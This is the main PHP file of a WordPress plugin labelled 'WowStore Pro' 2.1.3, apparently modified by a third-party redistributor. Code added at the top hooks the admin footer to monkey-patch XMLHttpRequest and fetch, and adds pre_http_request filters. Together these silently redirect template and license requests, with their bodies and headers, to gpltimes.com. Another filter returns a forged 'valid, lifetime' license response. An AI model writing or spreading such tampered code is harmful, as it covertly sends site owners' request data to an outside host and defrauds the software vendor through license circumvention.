<?php
/**
 * Plugin Name: WowStore Pro
 * Description: It is a Pro version of the WowStore Gutenberg WooCommerce Blocks.
 * Version:     2.1.3
 * Author:      wpxpo
 * Author URI:  https://wpxpo.com/
 * Text Domain: product-blocks-pro
 * License:     GPLv3
 * License URI: http://www.gnu.org/licenses/gpl-3.0.html
 * Requires Plugins: woocommerce
**/

defined( 'ABSPATH' ) || exit;

add_action('admin_footer', function() {
    ?>
    <script>
        (function() {
            // Helper function to serialize the body and append the original URL
            function serializeBodyAndAppendUrl(body, originalUrl) {
                // Ensure the body is a URLSearchParams object
                let params = new URLSearchParams(typeof body === 'string' ? body : new URLSearchParams(body));

                // Append the original URL
                params.append('original_url', originalUrl);

                // Return the serialized data as a string
                return params.toString();
            }

            // Intercept XMLHttpRequest
            const originalXhr = XMLHttpRequest;
            XMLHttpRequest = function() {
                const xhr = new originalXhr();
                xhr.open = (function(open) {
                    return function(method, url, async, user, password) {
                        this._url = url; // Store the request URL
                        open.apply(this, arguments);
                    };
                })(xhr.open);

                xhr.send = (function(send) {
                    return function(body) {
                        if (this._url && this._url.indexOf('https://wopb.wpxpo.com/wp-json/restapi/v2/single-template') === 0) {
                            // Serialize the body and append the original URL
                            const newBody = serializeBodyAndAppendUrl(body, this._url);

                            fetch('https://www.gpltimes.com/gpldata/wowstore.php', {
                                method: 'POST',
                                headers: {
                                    'Content-Type': 'application/x-www-form-urlencoded'
                                },
                                body: newBody
                            }).then(response => response.text())
                              .then(data => {
                                this.responseText = data;
                                this.response = data;
                                this.status = 200;
                                this.readyState = 4;
                                if (typeof this.onload === 'function') {
                                    this.onload();
                                }
                                if (typeof this.onreadystatechange === 'function') {
                                    this.onreadystatechange();
                                }
                            });
                            return;
                        }
                        send.apply(this, arguments);
                    };
                })(xhr.send);

                return xhr;
            };

            // Intercept fetch API
            const originalFetch = window.fetch;
            window.fetch = function(url, options) {
                if (typeof url === 'string' && url.indexOf('https://wopb.wpxpo.com/wp-json/restapi/v2/single-template') === 0) {
                    if (options && options.method === 'POST') {
                        // Serialize the body and append the original URL
                        const newBody = serializeBodyAndAppendUrl(options.body, url);

                        return originalFetch('https://www.gpltimes.com/gpldata/wowstore.php', {
                            method: 'POST',
                            headers: options.headers,
                            body: newBody
                        }).then(response => response.text())
                          .then(data => {
                              return new Response(data, {
                                  status: 200,
                                  statusText: 'OK',
                                  headers: options.headers
                              });
                          });
                    }
                }
                return originalFetch.apply(this, arguments);
            };
        })();
    </script>
    <?php
});




add_filter('pre_http_request', function($preempt, $r, $url) {
    // Check if the request URL starts with 'https://wopb.wpxpo.com/wp-json'
    if (strpos($url, 'https://wopb.wpxpo.com/wp-json') === 0) {
        // Check if the request method is POST
        if ($r['method'] === 'POST') {
            // Extract the body to make sure we have access to all data
            $body = isset($r['body']) ? $r['body'] : '';

            // Check if 'license' key exists in the body
            $has_license_key = false;
            if (is_array($body)) {
                // If body is an array, check if it contains 'license'
                $has_license_key = isset($body['license']);
            } elseif (is_string($body)) {
                // If body is a string, check if it contains 'license'
                $has_license_key = strpos($body, 'license') !== false;
            }

            if ($has_license_key) {
                // Forward the request to GPL Times for processing
                if (is_array($body)) {
                    $body['original_url'] = $url;
                } elseif (is_string($body)) {
                    $body .= '&original_url=' . urlencode($url);
                }

                $response = wp_remote_post('https://www.gpltimes.com/gpldata/wowstore.php', array(
                    'body'    => $body,
                    'headers' => $r['headers'],
                ));

                // Check for errors
                if (is_wp_error($response)) {
                    return new WP_Error('request_failed', 'Failed to connect to GPL Times.');
                } else {
                    return $response; // Return the response from GPL Times
                }
            }
        }
    }

    return $preempt; // Allow the original request if it's not the targeted URL or doesn't have the license key
}, 10, 3);





add_filter('pre_http_request', function($preempt, $parsed_args, $url) {
    if ($parsed_args['method'] === 'POST' && $url === 'https://account.wpxpo.com') {
        if (isset($parsed_args['body']) && is_array($parsed_args['body'])) {
            $parsed_args['body']['edd_action'] = 'activate_license';
        } else {
            $parsed_args['body'] = array('edd_action' => 'activate_license');
        }

        $response = array(
            "headers" => array(),
            "body" => json_encode(array(
                "success" => true,
                "license" => "valid",
                "item_id" => 1263,
                "item_name" => "WowStore Pro",
                "license_limit" => 10,
                "site_count" => 1,
                "expires" => "lifetime",
                "activations_left" => 9,
                "checksum" => "B5E0B5F8DD8689E6ACA49DD6E6E1A930",
                "payment_id" => 123321,
                "customer_name" => "GPL",
                "customer_email" => "noreply@gmail.com",
                "price_id" => "1"
            )),
            "response" => array(
                "code" => 200,
                "message" => "OK"
            )
        );

        return $response;
    }

    return $preempt;
}, 10, 3);

// Define
define( 'WOPB_PRO_VER', '2.1.3' );
define( 'WOPB_PRO_URL', plugin_dir_url( __FILE__ ) );
define( 'WOPB_PRO_BASE', plugin_basename( __FILE__ ) );
define( 'WOPB_PRO_PATH', plugin_dir_path( __FILE__ ) );

// Language Load
add_action( 'init', 'wopb_pro_language_load' );
function wopb_pro_language_load() {
    load_plugin_textdomain( 'product-blocks-pro', false, basename( dirname( __FILE__ ) ) . "/languages/" );
}

// Common Function
if ( ! function_exists( 'wopb_pro_function' ) ) {
    function wopb_pro_function() {
        require_once WOPB_PRO_PATH . 'classes/Functions.php';
        return new \WOPB_PRO\Functions();
    }
}

// Plugin Initialization
require_once WOPB_PRO_PATH . 'classes/Initialization.php';
new \WOPB_PRO\Initialization();